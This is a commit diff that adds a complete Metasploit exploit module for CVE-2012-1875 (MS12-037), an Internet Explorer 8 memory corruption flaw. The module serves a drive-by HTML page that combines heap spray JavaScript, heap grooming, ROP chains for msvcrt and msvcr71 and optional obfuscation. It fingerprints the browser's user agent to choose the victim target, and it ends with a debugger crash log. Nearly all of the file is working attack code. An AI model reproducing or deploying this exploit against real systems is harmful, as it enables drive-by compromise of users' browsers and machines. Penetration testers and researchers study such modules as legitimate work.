Added module for CVE-2012-1875 as exploited in the wild

modules/exploits/windows/browser/ms12_037_same_id.rb

@@ -0,0 +1,337 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption",
+			'Description'    => %q{
+					This module exploits a memory corruption flaw in Internet Explorer 8 when
+				handling objects with the same ID property. At the moment this module targets
+				IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited
+				in the wild.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Dark Son ', # Vulnerability discovery
+					'Qihoo 360 Security Center', # Vulnerability discovery
+					'Yichong Lin', # Vulnerability discovery
+					'Google Inc.', # Vulnerability discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'MSB', 'MS12-037'],
+					[ 'CVE', '2012-1875' ],
+					[ 'OSVDB', '82865'],
+					[ 'URL', 'https://twitter.com/binjo/status/212795802974830592' ] # Exploit found in the wild
+				],
+			'Payload'        =>
+				{
+					'Space'    => 1024,
+					'BadChars' => "\x00",
+					'DisableNops' => true
+				},
+			'DefaultOptions'  =>
+				{
+					'InitialAutoRunScript' => 'migrate -f'
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', {} ],
+					[
+						'IE 8 on Windows XP SP3 with msvcrt ROP',
+						{
+							'Rop'    => :msvcrt,
+							'RopOffset' => '0x5f4',
+							'Ret'    => 0x77c15ed5 # xchg eax, esp # ret # from msvcrt.dll
+						}
+					],
+					[
+						'IE 8 on Windows XP SP3 with JRE ROP',
+						{
+							'Rop'    => :jre,
+							'RopOffset' => '0x5f4',
+							'Ret'    => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
+						}
+					],
+					[
+						'IE 8 on Windows 7 SP1 with JRE ROP',
+						{
+							'Rop'    => :jre,
+							'RopOffset' => '0x5f4',
+							'Ret'    => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
+						}
+					],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jun 12 2012",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+			], self.class)
+
+	end
+
+	def get_target(agent)
+		# If the user is already specified by the user, we'll just use that
+		return target if target.name != 'Automatic'
+
+		if agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
+			#Windows XP SP3 + IE 8.0
+			return targets[1]
+		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
+			#Windows 7 SP1 + IE 8.0
+			return targets[3]
+		else
+			return nil
+		end
+	end
+
+	def junk(n=4)
+		return rand_text_alpha(n).unpack("V").first
+	end
+
+	def nop
+		return make_nops(4).unpack("V").first
+	end
+
+	def ret(t)
+		case t['Rop']
+		when :msvcrt
+			return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
+		when :jre
+			return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll
+		end
+	end
+
+	def popret(t)
+		case t['Rop']
+		when :msvcrt
+			return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
+		when :jre
+			return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll
+		end
+	end
+
+	def get_rop_chain(t)
+
+		adjust = ret(t) * 27
+		adjust << popret(t)
+		adjust << [t.ret].pack("V") # stackpivot
+
+		# Both ROP chains generated by mona.py - See corelan.be
+		case t['Rop']
+		when :msvcrt
+			print_status("Using msvcrt ROP")
+			rop =
+			[
+				0x77c4e392,  # POP EAX # RETN
+				0x77c11120,  # <- *&VirtualProtect()
+				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+				junk,
+				0x77c2dd6c,
+				0x77c4ec00,  # POP EBP # RETN
+				0x77c35459,  # ptr to 'push esp #  ret'
+				0x77c47705,  # POP EBX # RETN
+				0x00001000,  # EBX
+				0x77c3ea01,  # POP ECX # RETN
+				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
+				0x77c46100,  # POP EDI # RETN
+				0x77c46101,  # ROP NOP (-> edi)
+				0x77c4d680,  # POP EDX # RETN
+				0x00000040,  # newProtect (0x40) (-> edx)
+				0x77c4e392,  # POP EAX # RETN
+				nop,         # NOPS (-> eax)
+				0x77c12df9,  # PUSHAD # RETN
+			].pack("V*")
+
+		when :jre
+			print_status("Using JRE ROP")
+			rop =
+			[
+				0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
+				0x00001000,  # (dwSize)
+				0x7c347f98,  # RETN (ROP NOP)
+				0x7c3415a2,  # JMP [EAX]
+				0xffffffff,
+				0x7c376402,  # skip 4 bytes
+				0x7c345255,  # INC EBX # FPATAN # RETN
+				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
+				0x7c344f87,  # POP EDX # RETN
+				0x00000040,  # flNewProtect
+				0x7c34d201,  # POP ECX # RETN
+				0x7c38b001,  # &Writable location
+				0x7c347f97,  # POP EAX # RETN
+				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
+				0x7c345c30,  # ptr to 'push esp #  ret '
+			].pack("V*")
+		end
+
+		code = adjust
+		code << rop
+		return code
+
+	end
+
+	def on_request_uri(cli, request)
+
+		agent = request.headers['User-Agent']
+		my_target = get_target(agent)
+
+		# Avoid the attack if the victim doesn't have the same setup we're targeting
+		if my_target.nil?
+			print_error("Browser not supported: #{agent}")
+			send_not_found(cli)
+			return
+		end
+
+		print_status("Client requesting: #{request.uri}")
+
+		p = payload.encoded
+
+		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
+		js_padding = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(my_target.arch))
+		js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
+		js_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+
+		js_spray = <<-JS
+		var heap_obj = new heapLib.ie(0x20000);
+		var code = unescape("#{js_code}");
+		var rop_chain = unescape("#{js_rop}");
+		var random = unescape("#{js_padding}");
+		var nops = unescape("#{js_nops}");
+
+		while (random.length < 0x80000) random += random;
+		while (nops.length < 0x80000) nops += nops;
+
+		var padding = random.substring(0, #{my_target['RopOffset']}-code.length);
+		var shellcode = code + padding + rop_chain + nops.substring(0, 0x800-code.length-padding.length-rop_chain.length);
+
+		while (shellcode.length < 0x40000) shellcode += shellcode;
+		var block = shellcode.substring(0, (0x80000-6)/2);
+
+		heap_obj.gc();
+		for (var z=1; z < 0x385; z++) {
+			heap_obj.alloc(block);
+		}
+		JS
+
+		js_spray = heaplib(js_spray, {:noobfu => true})
+
+		trigger_f = "trigger"
+		feng_shui_f = "feng_shui"
+		crash_f = "crash"
+		unescape_f = "do_unescape"
+		main_f = "main"
+		a_id = "MyA"
+		danger_id = "imgTest"
+
+		if datastore['OBFUSCATE']
+			js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
+			js_spray.obfuscate
+
+			trigger_f = rand_text_alpha(rand(5) + 4)
+			feng_shui_f = rand_text_alpha(rand(5) + 4)
+			crash_f = rand_text_alpha(rand(5) + 4)
+			unescape_f = rand_text_alpha(rand(5) + 4)
+			main_f = rand_text_alpha(rand(5) + 4)
+			a_id = rand_text_alpha(rand(5) + 4)
+			danger_id = rand_text_alpha(rand(5) + 4)
+		end
+
+		html = %Q|
+			<HTML>
+			<BODY>
+			<title></title>
+			<DIV id=testfaild>
+				<img id="#{danger_id}" style="display:none">
+				<a href="javascript:#{feng_shui_f}();" id="#{a_id}" onClick="#{feng_shui_f}();">
+				<div style="background-color:#FFFFFF; width:30; height:40" id="#{danger_id}" src="" onMouseOver="#{crash_f}();" onMouseOut="#{crash_f}();">
+				</div>
+				</a>
+			</DIV>
+			<SCRIPT LANGUAGE="JavaScript">
+			function #{unescape_f}(dword) {
+				var t = unescape;
+				var d = Number(dword).toString(16);
+				while (d.length < 8) d = '0' + d;
+				return t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
+			}
+			function #{feng_shui_f}() {
+				var tag = 0x1c1c1c0c;
+				var vtable1 = #{unescape_f}(tag) + '1234567555555555588888888';
+				var divs = new Array();
+				for (var i = 0; i < 128; i++) divs.push(document.createElement('div'));
+				testfaild.innerHTML = testfaild.innerHTML;
+				divs[0].className = vtable1;
+				divs[1].className = vtable1;
+				divs[2].className = vtable1;
+				divs[3].className = vtable1;
+			}
+			function #{crash_f}() {
+				eval("#{danger_id}").src = "";
+			}
+			function #{trigger_f}() {
+				var x = document.getElementsByTagName("div");
+				var fireOnThis = document.getElementById("#{a_id}");
+				if (document.createEvent) {
+					evObj = document.createEvent('MouseEvents');
+					evObj.iniEvent('click', true, false);
+					fireOnThis.dispatchEvent(evObj);
+				} else if (document.createEventObject) {
+					x[1].fireEvent('onMouseOver');
+					fireOnThis.fireEvent('onclick');
+					x[1].fireEvent('onMouseOut');
+				}
+			}
+			function #{main_f}() {
+
+				#{js_spray}
+				setTimeout("#{trigger_f}();", 1000);
+
+			}
+			#{main_f}();
+			</SCRIPT>
+			</BODY>
+			</HTML>
+		|
+
+		html = html.gsub(/^\t\t\t/, '')
+
+		print_status("Sending html")
+		send_response(cli, html, {'Content-Type'=>'text/html'})
+	end
+
+end
+
+
+=begin
+* crash
+(a9c.998): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export
+symbols for C:\WINDOWS\system32\mshtml.dll -
+eax=1c1c1c0c ebx=00000000 ecx=02fdf588 edx=00000001 esi=02fdf588 edi=020bbaf0
+eip=6363fcc6 esp=020bba88 ebp=020bba94 iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+mshtml!DllGetClassObject+0xafd09:
+6363fcc6 8b5070          mov     edx,dword ptr [eax+70h]
+ds:0023:1c1c1c7c=????????
+=end